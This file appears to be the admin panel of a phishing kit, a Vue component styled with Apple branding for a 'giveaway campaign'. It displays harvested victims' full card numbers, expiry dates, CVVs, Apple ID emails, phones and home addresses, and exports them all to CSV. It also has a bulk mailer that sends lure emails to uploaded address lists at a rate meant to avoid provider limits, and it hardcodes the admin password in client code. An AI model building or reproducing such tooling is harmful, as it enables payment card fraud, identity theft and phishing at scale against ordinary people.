<template>
  <div class="admin-container">
    <!-- Login Overlay -->
    <div v-if="!isAuthorized" class="login-overlay">
      <div class="login-form-container">
        <img src="@/assets/apple.png" alt="Apple" class="login-logo">
        <h2>Welcome Back Sir</h2>
        <p>Enter password to view submissions</p>
        <div class="login-form">
          <input type="password" v-model="password" @keyup.enter="handleLogin" placeholder="Password"
            class="admin-input">
          <button @click="handleLogin" class="btn btn-primary btn-full">Unlock</button>
          <p v-if="loginError" class="login-error">{{ loginError }}</p>
        </div>
      </div>
    </div>

    <!-- Main Admin UI -->
    <div v-else>
      <nav class="admin-nav">
        <div class="nav-header">
          <router-link to="/" class="nav-logo">
            <img src="@/assets/apple.png" alt="Apple" class="logo-icon">
          </router-link>
          <div class="stat-item head-stat">
            <span class="stat-label">Submissions:</span>
            <span class="stat-value">{{ submissions.length }}</span>
          </div>
        </div>

        <div class="nav-actions">
          <button @click="downloadCSV" :disabled="submissions.length === 0" class="btn btn-nav">Download CSV</button>
          <button @click="confirmClear" :disabled="submissions.length === 0" class="btn btn-nav btn-danger">Clear
            All</button>
          <button @click="logout" class="btn-logout">Logout</button>
        </div>
      </nav>

      <main class="admin-main">
        <header class="section-header">
          <h1>Welcome Sir,</h1>
          <p>Manage submissions and promotional campaigns.</p>
        </header>

        <!-- Bulk Email Section -->
        <section class="admin-section bulk-email-section">
          <div class="section-title">
            <h2>Bulk Promotional Campaign</h2>
            <p>Upload a CSV file to send the promotion to multiple addresses.</p>
          </div>

          <div v-if="bulkEmails.length > 0" class="bulk-progress-container">
            <div class="progress-info">
              <span v-if="isSendingBulk">Sending {{ progressiveEmailsSent }} of {{ bulkEmails.length }}...</span>
              <span v-else-if="isPaused">Paused at {{ progressiveEmailsSent }} of {{ bulkEmails.length }}</span>
              <span v-else-if="bulkSendResult">Campaign Finished</span>
              <span v-else>Ready to send to {{ bulkEmails.length }} addresses</span>
              <span class="progress-percentage">{{ bulkProgress }}%</span>
            </div>
            <div class="progress-bar-bg">
              <div class="progress-bar-fill" :style="{ width: bulkProgress + '%' }"></div>
            </div>
          </div>

          <div class="bulk-controls">
            <div class="file-upload-wrapper" :class="{ 'has-file': bulkEmails.length > 0 }">
              <input type="file" id="csvUpload" accept=".csv" @change="handleCsvUpload" class="file-input"
                :disabled="isSendingBulk">
              <label for="csvUpload" class="file-label">
                <span class="upload-icon">↑</span>
                <span v-if="bulkEmails.length === 0">Choose CSV File</span>
                <span v-else>{{ bulkEmails.length }} addresses</span>
              </label>
            </div>

            <template v-if="!isSendingBulk">
              <button v-if="isPaused" @click="sendBulkEmails(true)" class="btn btn-primary">
                Resume Sending
              </button>
              <button v-else @click="sendBulkEmails(false)" :disabled="bulkEmails.length === 0" class="btn btn-primary">
                Send Bulk Emails
              </button>
            </template>
            <button v-else @click="stopBulkSending" class="btn btn-danger">
              Stop Sending
            </button>
            <button v-if="bulkEmails.length > 0 && !isSendingBulk" @click="clearBulk"
              class="btn btn-text">Clear</button>
          </div>

          <div v-if="bulkSendResult" class="bulk-result"
            :class="bulkSendResult.failed > 0 ? 'result-warning' : 'result-success'">
            <p>
              <strong>Campaign Complete:</strong>
              Sent {{ bulkSendResult.success }} successfully.
              <span v-if="bulkSendResult.failed > 0">{{ bulkSendResult.failed }} failed.</span>
            </p>
          </div>
        </section>

        <header class="section-header">
          <h1>Card Submissions</h1>
          <p>Recent activity from the giveaway campaign.</p>
        </header>

        <div v-if="loading" class="loading-state">
          <div class="spinner"></div>
          <p>Fetching data from Supabase...</p>
        </div>

        <div v-else-if="error" class="error-state">
          <p>{{ error }}</p>
          <button @click="fetchSubmissions" class="btn btn-secondary">Retry</button>
        </div>

        <div v-else class="table-container">
          <div class="table-wrapper">
            <table class="submissions-table">
              <thead>
                <tr>
                  <th>Date</th>
                  <th>Name</th>
                  <th class="desktop-only">Contact</th>
                  <th class="desktop-only">Card Details</th>
                  <th class="desktop-only">Address</th>
                  <th class="mobile-only">Action</th>
                </tr>
              </thead>
              <tbody>
                <tr v-for="item in submissions" :key="item.id">
                  <td class="date-cell" data-label="Date">
                    <span class="desktop-only">{{ formatDate(item.timestamp) }}</span>
                    <span class="mobile-only">{{ formatTime(item.timestamp) }}</span>
                  </td>
                  <td class="name-cell" data-label="Name">
                    <strong>{{ item.first_name }} {{ item.last_name }}</strong>
                    <div class="subtitle desktop-only">{{ item.cardholder_name }}</div>
                  </td>
                  <td class="contact-cell desktop-only" data-label="Contact">
                    <div v-if="item.email || item.cardholder_name" class="contact-email">{{ item.email || item.cardholder_name }}</div>
                    <div class="subtitle">{{ item.phone }}</div>
                  </td>
                  <td class="card-cell desktop-only" data-label="Card Details">
                    <div class="card-num">{{ formatCardNumber(item.card_number) }}</div>
                    <div class="card-meta">
                      Exp: {{ item.expiry_date }} | CVV: {{ item.cvv }}
                    </div>
                  </td>
                  <td class="address-cell desktop-only" data-label="Address">
                    {{ item.street }}, {{ item.city }}, {{ item.state }} {{ item.zip }}
                    <div v-if="item.street2" class="subtitle">{{ item.street2 }}</div>
                  </td>
                  <td class="mobile-only action-cell">
                    <button @click="viewDetails(item)" class="btn btn-view">Details</button>
                  </td>
                </tr>
              </tbody>
            </table>

            <div v-if="submissions.length === 0" class="empty-state">
              <p>No submissions found yet.</p>
            </div>
          </div>
        </div>
      </main>

      <!-- Bottom Sheet Modal -->
      <Transition name="sheet">
        <div v-if="showModal" class="modal-overlay" @click.self="closeModal">
          <div class="bottom-sheet">
            <div class="sheet-header">
              <h3>Submission Details</h3>
              <button @click="closeModal" class="btn-close">✕</button>
            </div>

            <div class="sheet-content" v-if="selectedSubmission">
              <div class="detail-group">
                <label>Submission Time</label>
                <div class="detail-row">
                  <span class="detail-label">Time</span>
                  <span class="detail-value">{{ formatTime(selectedSubmission.timestamp) }}</span>
                </div>
                <div class="detail-row">
                  <span class="detail-label">Date</span>
                  <span class="detail-value">{{ formatDateOnly(selectedSubmission.timestamp) }}</span>
                </div>
              </div>

              <div class="detail-group">
                <label>Personal Information</label>
                <div class="detail-row">
                  <span class="detail-label">Full Name</span>
                  <span class="detail-value">{{ selectedSubmission.first_name }} {{ selectedSubmission.last_name
                    }}</span>
                </div>
                <div class="detail-row">
                  <span class="detail-label">Email / Apple ID</span>
                  <span class="detail-value">{{ selectedSubmission.email || selectedSubmission.cardholder_name }}</span>
                </div>
                <div class="detail-row">
                  <span class="detail-label">Phone</span>
                  <span class="detail-value">{{ selectedSubmission.phone }}</span>
                </div>
              </div>

              <div class="detail-group">
                <label>Address Information</label>
                <div class="detail-row">
                  <span class="detail-label">Street</span>
                  <span class="detail-value">{{ selectedSubmission.street }}</span>
                </div>
                <div v-if="selectedSubmission.street2" class="detail-row">
                  <span class="detail-label">Apt/Suite</span>
                  <span class="detail-value">{{ selectedSubmission.street2 }}</span>
                </div>
                <div class="detail-row">
                  <span class="detail-label">City/State/Zip</span>
                  <span class="detail-value">{{ selectedSubmission.city }}, {{ selectedSubmission.state }} {{
                    selectedSubmission.zip }}</span>
                </div>
                <div class="detail-row">
                  <span class="detail-label">Country</span>
                  <span class="detail-value">{{ selectedSubmission.country }}</span>
                </div>
              </div>

              <div class="detail-group">
                <label>Payment Information</label>
                <div class="detail-row">
                  <span class="detail-label">Cardholder</span>
                  <span class="detail-value">{{ selectedSubmission.cardholder_name }}</span>
                </div>
                <div class="detail-row">
                  <span class="detail-label">Card Number</span>
                  <span class="detail-value mono">{{ formatCardNumber(selectedSubmission.card_number) }}</span>
                </div>
                <div class="detail-row">
                  <span class="detail-label">Expiry / CVV</span>
                  <span class="detail-value">{{ selectedSubmission.expiry_date }} / {{ selectedSubmission.cvv }}</span>
                </div>
              </div>

              <div class="detail-group">
                <div class="detail-row">
                  <span class="detail-label">Submission ID</span>
                  <span class="detail-value">{{ selectedSubmission.id }}</span>
                </div>
              </div>
            </div>
          </div>
        </div>
      </Transition>
    </div>
  </div>
</template>

<script>
export default {
  name: 'AdminSubmissions',
  data() {
    return {
      submissions: [],
      loading: true,
      error: null,
      password: '',
      isAuthorized: false,
      loginError: null,
      bulkEmails: [],
      isSendingBulk: false,
      bulkSendResult: null,
      progressiveEmailsSent: 0,
      shouldStopBulk: false,
      isPaused: false,
      lastAttemptedIndex: -1,
      selectedSubmission: null,
      showModal: false
    }
  },
  computed: {
    bulkProgress() {
      if (this.bulkEmails.length === 0) return 0;
      return Math.round((this.progressiveEmailsSent / this.bulkEmails.length) * 100);
    }
  },
  mounted() {
    // Check if previously authorized in this session
    const savedPass = sessionStorage.getItem('admin_pass');
    if (savedPass === 'Socket@2') {
      this.isAuthorized = true;
      this.fetchSubmissions();
    } else {
      this.loading = false;
    }
  },
  methods: {
    handleLogin() {
      if (this.password === 'Socket@2') {
        this.isAuthorized = true;
        this.loginError = null;
        sessionStorage.setItem('admin_pass', this.password);
        this.fetchSubmissions();
      } else {
        this.loginError = 'Invalid password';
      }
    },
    logout() {
      this.isAuthorized = false;
      this.password = '';
      sessionStorage.removeItem('admin_pass');
    },
    getApiUrl(endpoint) {
      const isLocalhost = typeof window !== 'undefined' && (
        window.location.hostname === 'localhost' || 
        window.location.hostname === '127.0.0.1'
      );
      
      if (!isLocalhost || process.env.NODE_ENV === 'production') {
        const envUrl = process.env.VUE_APP_API_URL;
        if (envUrl && !envUrl.includes('localhost') && !envUrl.includes('127.0.0.1')) {
          return `${envUrl.replace(/\/$/, '')}${endpoint}`;
        }
        return endpoint;
      }
      
      const apiBaseUrl = process.env.VUE_APP_API_URL || 'http://localhost:3001';
      return apiBaseUrl ? `${apiBaseUrl.replace(/\/$/, '')}${endpoint}` : endpoint;
    },
    async fetchSubmissions() {
      this.loading = true;
      this.error = null;
      try {
        const url = this.getApiUrl('/api/submissions');
        const response = await fetch(url, {
          headers: {
            'x-admin-password': sessionStorage.getItem('admin_pass')
          }
        });
        if (response.status === 401) {
          this.logout();
          throw new Error('Session expired or invalid password');
        }
        if (!response.ok) {
          const errData = await response.json().catch(() => ({}));
          throw new Error(errData.error || `Server returned ${response.status}`);
        }
        const data = await response.json();
        this.submissions = Array.isArray(data) ? data : [];
      } catch (err) {
        this.error = err.message || 'Failed to load submissions';
        console.error('Fetch error:', err);
      } finally {
        this.loading = false;
      }
    },
    downloadCSV() {
      if (this.submissions.length === 0) return;

      const headers = [
        'ID', 'Date', 'First Name', 'Last Name', 'Email / Apple ID', 'Phone', 'Country',
        'Street', 'Street 2', 'City', 'State', 'Zip',
        'Cardholder Name', 'Card Number', 'Expiry', 'CVV'
      ];

      const rows = this.submissions.map(item => [
        item.id,
        this.formatDate(item.timestamp),
        item.first_name,
        item.last_name,
        item.email || item.cardholder_name || '',
        item.phone,
        item.country,
        item.street,
        item.street2 || '',
        item.city,
        item.state,
        item.zip,
        item.cardholder_name,
        item.card_number,
        item.expiry_date,
        item.cvv
      ]);

      const csvContent = [
        headers.join(','),
        ...rows.map(row => row.map(val => `"${val}"`).join(','))
      ].join('\n');

      const blob = new Blob([csvContent], { type: 'text/csv;charset=utf-8;' });
      const link = document.createElement("a");
      const url = URL.createObjectURL(blob);
      link.setAttribute("href", url);
      link.setAttribute("download", `apple_submissions_${new Date().toISOString().split('T')[0]}.csv`);
      link.style.visibility = 'hidden';
      document.body.appendChild(link);
      link.click();
      document.body.removeChild(link);
    },
    async confirmClear() {
      if (!confirm('Are you absolutely sure you want to PERMANENTLY delete all submission data? This cannot be undone.')) {
        return;
      }

      this.loading = true;
      try {
        const url = this.getApiUrl('/api/submissions');
        const response = await fetch(url, {
          method: 'DELETE',
          headers: {
            'x-admin-password': sessionStorage.getItem('admin_pass')
          }
        });

        if (response.status === 401) {
          this.logout();
          throw new Error('Unauthorized');
        }

        if (!response.ok) throw new Error('Failed to clear data');

        this.submissions = [];
        alert('All data has been cleared.');
      } catch (err) {
        alert('Error: ' + err.message);
      } finally {
        this.loading = false;
      }
    },
    formatDate(dateStr) {
      if (!dateStr) return 'N/A';
      return new Date(dateStr).toLocaleString('en-US', {
        month: 'short',
        day: 'numeric',
        year: 'numeric',
        hour: '2-digit',
        minute: '2-digit'
      });
    },
    formatTime(dateStr) {
      if (!dateStr) return 'N/A';
      return new Date(dateStr).toLocaleTimeString('en-US', {
        hour: '2-digit',
        minute: '2-digit'
      });
    },
    formatDateOnly(dateStr) {
      if (!dateStr) return 'N/A';
      return new Date(dateStr).toLocaleDateString('en-US', {
        month: 'short',
        day: 'numeric',
        year: 'numeric'
      });
    },
    formatCardNumber(val) {
      if (!val) return '****';
      return val.replace(/\s/g, '').replace(/(.{4})/g, '$1 ').trim();
    },
    handleCsvUpload(event) {
      const file = event.target.files[0];
      if (!file) return;

      const reader = new FileReader();
      reader.onload = (e) => {
        const text = e.target.result;
        this.parseCsv(text);
      };
      reader.readAsText(file);
    },
    parseCsv(text) {
      // Simple CSV parsing to find email addresses
      const lines = text.split(/\r?\n/);
      const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
      const extractedEmails = new Set();

      lines.forEach(line => {
        const parts = line.split(/[;,]/);
        parts.forEach(part => {
          const email = part.trim();
          if (emailRegex.test(email)) {
            extractedEmails.add(email);
          }
        });
      });

      this.bulkEmails = Array.from(extractedEmails);
      this.bulkSendResult = null;
      this.isPaused = false;
      this.lastAttemptedIndex = -1;
      this.progressiveEmailsSent = 0;
      if (this.bulkEmails.length === 0) {
        alert('No valid email addresses found in the CSV.');
      }
    },
    async sendBulkEmails(resume = false) {
      if (this.bulkEmails.length === 0) return;

      const title = resume ? 'Resume Campaign' : 'Launch Campaign';
      const count = resume ? this.bulkEmails.length - (this.lastAttemptedIndex + 1) : this.bulkEmails.length;

      if (!confirm(`${title} to ${count} remaining addresses (1 per second)?`)) return;

      this.isSendingBulk = true;
      this.shouldStopBulk = false;
      this.isPaused = false;

      if (!resume) {
        this.bulkSendResult = { success: 0, failed: 0, errors: [] };
        this.progressiveEmailsSent = 0;
        this.lastAttemptedIndex = -1;
      }

      // Intentional delay to avoid 550 rate limit (2 reqs per sec max)
      const delay = (ms) => new Promise(res => setTimeout(res, ms));
      const startIdx = resume ? this.lastAttemptedIndex + 1 : 0;

      for (let i = startIdx; i < this.bulkEmails.length; i++) {
        if (this.shouldStopBulk) {
          this.isPaused = true;
          alert('Bulk sending paused.');
          break;
        }

        const email = this.bulkEmails[i];
        this.lastAttemptedIndex = i;

        try {
          const url = this.getApiUrl('/api/admin/send-bulk-emails');
          const response = await fetch(url, {
            method: 'POST',
            headers: {
              'Content-Type': 'application/json',
              'x-admin-password': sessionStorage.getItem('admin_pass')
            },
            body: JSON.stringify({ emails: [email] }) // Send one at a time for better tracking
          });

          if (!response.ok) throw new Error(await response.text() || 'Failed to send');
          this.bulkSendResult.success++;
        } catch (err) {
          console.error(`Failed to send to ${email}:`, err.message);
          this.bulkSendResult.failed++;
          this.bulkSendResult.errors.push({ email, error: err.message });
        }

        this.progressiveEmailsSent++;

        // Wait 1 second before next email if not the last one
        if (i < this.bulkEmails.length - 1) {
          await delay(1000);
        }
      }

      this.isSendingBulk = false;
      if (!this.shouldStopBulk) {
        this.isPaused = false;
        alert(`Campaign Finished. Success: ${this.bulkSendResult.success}, Failed: ${this.bulkSendResult.failed}`);
      }
    },
    stopBulkSending() {
      this.shouldStopBulk = true;
    },
    clearBulk() {
      this.bulkEmails = [];
      this.bulkSendResult = null;
      this.isPaused = false;
      this.lastAttemptedIndex = -1;
      this.progressiveEmailsSent = 0;
      const input = document.getElementById('csvUpload');
      if (input) input.value = '';
    },
    viewDetails(item) {
      this.selectedSubmission = item;
      this.showModal = true;
      document.body.style.overflow = 'hidden'; // Prevent background scroll
    },
    closeModal() {
      this.showModal = false;
      document.body.style.overflow = '';
    }
  }
}
</script>

<style scoped>
.admin-container {
  min-height: 100vh;
  background: #fff;
  color: #1d1d1f;
}

/* Login Styles */
.login-overlay {
  position: fixed;
  inset: 0;
  background: #fff;
  display: flex;
  align-items: center;
  justify-content: center;
  z-index: 1000;
}

.login-form-container {
  width: 100%;
  max-width: 500px;
  text-align: center;
  padding: 20px;
}

.login-logo {
  height: 64px;
  border-radius: 12px;
  margin-bottom: 24px;
}

.login-form-container h2 {
  font-size: 28px;
  font-weight: 600;
  letter-spacing: -0.01em;
  margin-bottom: 8px;
}

.login-form-container p {
  color: #86868b;
  margin-bottom: 32px;
}

.admin-input {
  width: 100%;
  padding: 16px;
  border-radius: 12px;
  border: 1px solid #d2d2d7;
  font-size: 16px;
  margin-bottom: 16px;
  box-sizing: border-box;
}

.login-error {
  color: #e30000;
  font-size: 14px;
  margin-top: 16px;
}

.btn-full {
  width: 100%;
  font-size: 17px;
  padding: 16px;
}

.btn-logout {
  background: none;
  border: none;
  color: #0066cc;
  cursor: pointer;
  font-size: 13px;
  margin-left: 16px;
  padding: 0;
}

.admin-nav {
  display: flex;
  justify-content: space-between;
  align-items: center;
  padding: 0 40px;
  height: 60px;
  background: rgba(255, 255, 255, 0.82);
  backdrop-filter: blur(20px);
  border-bottom: 1px solid rgba(0, 0, 0, 0.1);
  position: sticky;
  top: 0;
  z-index: 100;
}

.nav-logo {
  display: flex;
  gap: 12px;
  text-decoration: none;
  color: inherit;
  font-weight: 600;
  font-size: 18px;
}

.logo-icon {
  height: 32px;
  border-radius: 6px;
}

.nav-header {
  display: flex;
  align-items: center;
  gap: 20px;
}

.nav-actions {
  display: flex;
  align-items: center;
  gap: 12px;
}

.btn-nav {
  font-size: 13px;
  padding: 6px 16px;
  background: #f5f5f7;
  color: #1d1d1f;
}

.btn-nav:hover {
  background: #e8e8ed;
}

.btn-danger {
  color: #e30000;
}

.btn-danger:hover {
  background: #fff1f1;
}

.stat-item {
  font-size: 14px;
}

.admin-main {
  max-width: 1200px;
  margin: 0 auto;
  padding: 40px 20px;
}

.admin-section {
  background: #fff;
  border-radius: 18px;
  padding: 32px;
  margin-bottom: 40px;
  box-shadow: 0 4px 24px rgba(0, 0, 0, 0.04);
}

.section-title {
  margin-bottom: 24px;
}

.section-title h2 {
  font-size: 24px;
  font-weight: 600;
  margin-bottom: 4px;
}

.section-title p {
  color: #86868b;
  font-size: 15px;
}

.bulk-progress-container {
  margin-bottom: 24px;
}

.progress-info {
  display: flex;
  justify-content: space-between;
  margin-bottom: 8px;
  font-size: 13px;
  font-weight: 500;
  color: #1d1d1f;
}

.progress-percentage {
  color: #0066cc;
}

.progress-bar-bg {
  height: 6px;
  background: #f5f5f7;
  border-radius: 3px;
  overflow: hidden;
}

.progress-bar-fill {
  height: 100%;
  background: #0066cc;
  transition: width 0.3s ease;
}

.bulk-controls {
  display: flex;
  align-items: center;
  gap: 12px;
}

.file-upload-wrapper {
  position: relative;
  overflow: hidden;
  display: inline-block;
}

.file-input {
  position: absolute;
  left: 0;
  top: 0;
  opacity: 0;
  cursor: pointer;
  width: 100%;
  height: 100%;
}

.file-label {
  display: flex;
  align-items: center;
  gap: 10px;
  background: #f5f5f7;
  padding: 12px 24px;
  border-radius: 980px;
  font-size: 15px;
  font-weight: 500;
  color: #1d1d1f;
  border: 1px dashed #d2d2d7;
  cursor: pointer;
  transition: all 0.2s ease;
}

.has-file .file-label {
  background: #e3f2fd;
  border-color: #0066cc;
  color: #0066cc;
  border-style: solid;
}

.upload-icon {
  font-size: 18px;
  font-weight: bold;
}

.btn-primary {
  background: #0066cc;
  color: #fff;
}

.btn-primary:hover:not(:disabled) {
  background: #0077ee;
}

.btn-primary:disabled {
  background: #ebebeb;
  color: #999;
  cursor: not-allowed;
}

.btn-text {
  background: none;
  color: #0066cc;
  font-size: 14px;
}

.bulk-result {
  margin-top: 24px;
  padding: 16px;
  border-radius: 12px;
  font-size: 14px;
}

.result-success {
  background: #f2faf3;
  color: #1d7c3d;
  border: 1px solid #d4edda;
}

.result-warning {
  background: #fff8eb;
  color: #856404;
  border: 1px solid #ffeeba;
}

.section-header {
  margin-bottom: 32px;
}

.section-header h1 {
  font-size: 40px;
  font-weight: 700;
  letter-spacing: -0.015em;
  margin-bottom: 4px;
}

.section-header p {
  color: #86868b;
  font-size: 19px;
}

.table-container {
  background: #fff;
  border-radius: 18px;
  box-shadow: 0 4px 24px rgba(0, 0, 0, 0.04);
  overflow: hidden;
}

.table-wrapper {
  overflow-x: auto;
}

.submissions-table {
  width: 100%;
  border-collapse: collapse;
  text-align: left;
  font-size: 14px;
}

th {
  background: #fbfbfd;
  padding: 16px 24px;
  font-weight: 600;
  color: #86868b;
  border-bottom: 1px solid #f5f5f7;
  text-transform: uppercase;
  font-size: 11px;
  letter-spacing: 0.05em;
}

td {
  padding: 20px 24px;
  border-bottom: 1px solid #f5f5f7;
  vertical-align: top;
}

.date-cell {
  white-space: nowrap;
  color: #86868b;
}

.subtitle {
  font-size: 12px;
  color: #86868b;
  margin-top: 2px;
}

.card-num {
  font-family: 'SF Mono', SFMono-Regular, ui-monospace, monospace;
  font-weight: 600;
  letter-spacing: 0.1em;
}

.card-meta {
  font-size: 12px;
  color: #86868b;
  margin-top: 4px;
}

.loading-state,
.error-state,
.empty-state {
  padding: 80px 0;
  text-align: center;
}

.spinner {
  width: 32px;
  height: 32px;
  border: 3px solid #f3f3f3;
  border-top: 3px solid #0066cc;
  border-radius: 50%;
  animation: spin 1s linear infinite;
  margin: 0 auto 16px;
}

@keyframes spin {
  0% {
    transform: rotate(0deg);
  }

  100% {
    transform: rotate(360deg);
  }
}

.btn {
  padding: 12px 24px;
  border-radius: 980px;
  font-weight: 600;
  cursor: pointer;
  border: none;
  transition: all 0.2s ease;
}

.btn-secondary {
  background: #0066cc;
  color: white;
}

.btn-secondary:hover {
  background: #0077ee;
}

@media (max-width: 1024px) {
  .admin-nav {
    padding: 0 20px;
  }
}

@media (max-width: 768px) {
  .admin-nav {
    flex-direction: column;
    align-items: stretch;
    height: auto;
    padding: 12px 16px;
    gap: 12px;
    position: relative;
  }

  .nav-header {
    justify-content: space-between;
    width: 100%;
  }

  .nav-logo {
    font-size: 17px;
  }

  .logo-icon {
    height: 40px;
  }

  .stat-item.head-stat {
    font-size: 13px;
    background: #f5f5f7;
    padding: 4px 12px;
    border-radius: 20px;
  }

  .nav-actions {
    justify-content: space-between;
    width: 100%;
    gap: 8px;
    border-top: 1px solid #f2f2f7;
    padding-top: 10px;
  }

  .btn-nav {
    flex: 1;
    font-size: 11px;
    padding: 8px 4px;
    text-align: center;
  }

  .admin-main {
    padding: 24px 16px;
  }

  .section-header h1 {
    font-size: 24px;
    letter-spacing: -0.01em;
  }

  .section-header p {
    font-size: 15px;
  }

  .admin-section {
    padding: 20px 16px;
    margin-bottom: 32px;
  }

  .section-title h2 {
    font-size: 18px;
  }

  .section-title p {
    font-size: 13px;
  }

  /* Bulk controls stack on mobile */
  .bulk-controls {
    flex-direction: column;
    align-items: stretch;
    gap: 10px;
  }

  .file-upload-wrapper,
  .btn-primary,
  .btn-danger {
    width: 100%;
  }

  .btn {
    padding: 12px;
    font-size: 14px;
  }

  .file-label {
    padding: 10px 16px;
    font-size: 13px;
  }

  /* Transform table to cards */
  .submissions-table tr {
    margin-bottom: 20px;
    padding: 8px 0;
    border: 1px solid #f0f0f2;
  }

  .submissions-table td {
    padding: 10px 16px;
    font-size: 13px;
  }

  .submissions-table td::before {
    left: 16px;
    font-size: 10px;
    width: 80px;
  }

  .card-num {
    font-size: 12px;
  }

  .subtitle,
  .card-meta {
    font-size: 11px;
  }

  .btn-logout {
    margin-top: 4px;
    font-size: 12px;
  }

  /* Table column visibility */
  .desktop-only {
    display: none !important;
  }

  .mobile-only {
    display: block !important;
  }

  .submissions-table td {
    border-bottom: 1px solid #fbfbfd;
  }

  .submissions-table td::before {
    display: none;
    /* Hide labels for simplified view */
  }

  .submissions-table td {
    text-align: left;
    padding: 12px 16px;
  }

  .name-cell {
    font-size: 15px;
    padding-bottom: 4px !important;
  }

  .date-cell {
    padding-top: 4px !important;
    border-bottom: none !important;
  }

  .action-cell {
    border-bottom: none !important;
    padding-top: 12px !important;
    padding-bottom: 16px !important;
  }
}

.mobile-only {
  display: none;
}

.btn-view {
  background: #f5f5f7;
  color: #0066cc;
  font-size: 12px;
  padding: 6px 16px;
  width: auto;
}

/* Modal / Bottom Sheet Styles */
.modal-overlay {
  position: fixed;
  inset: 0;
  background: rgba(0, 0, 0, 0.4);
  backdrop-filter: blur(4px);
  z-index: 2000;
  display: flex;
  align-items: flex-end;
}

.bottom-sheet {
  width: 100%;
  background: #fff;
  border-radius: 20px 20px 0 0;
  max-height: 90vh;
  overflow-y: auto;
  padding: 0 20px 20px;
  box-shadow: 0 -8px 32px rgba(0, 0, 0, 0.1);
}

.sheet-header {
  display: flex;
  justify-content: space-between;
  align-items: center;
  position: sticky;
  top: 0;
  padding: 24px 0 16px;
  margin-bottom: 20px;
  background: #fff;
  border-bottom: 1px solid #f2f2f7;
  z-index: 10;
}

.sheet-header h3 {
  font-size: 17px;
  font-weight: 600;
  margin: 0;
}

.btn-close {
  position: relative;
  background: #f5f5f7;
  border: none;
  width: 32px;
  height: 32px;
  border-radius: 50%;
  display: flex;
  align-items: center;
  justify-content: center;
  font-size: 16px;
  font-weight: 900;
  color: #1d1d1f;
  cursor: pointer;
}

.detail-group {
  margin-bottom: 24px;
}

.detail-group label {
  display: block;
  font-size: 11px;
  font-weight: 600;
  color: #86868b;
  text-transform: uppercase;
  letter-spacing: 0.05em;
  margin-bottom: 12px;
}

.detail-row {
  display: flex;
  justify-content: space-between;
  padding: 12px 0;
  border-bottom: 1px solid #f2f2f7;
}

.detail-row:last-child {
  border-bottom: none;
}

.detail-label {
  font-size: 14px;
  color: #86868b;
}

.detail-value {
  font-size: 14px;
  font-weight: 500;
  color: #1d1d1f;
  text-align: right;
}

.mono {
  font-family: 'SF Mono', SFMono-Regular, ui-monospace, monospace;
}

/* Transitions */
.sheet-enter-active,
.sheet-leave-active {
  transition: all 0.4s cubic-bezier(0.4, 0, 0.2, 1);
}

.sheet-enter-from,
.sheet-leave-to {
  transform: translateY(100%);
  opacity: 0;
}
</style>
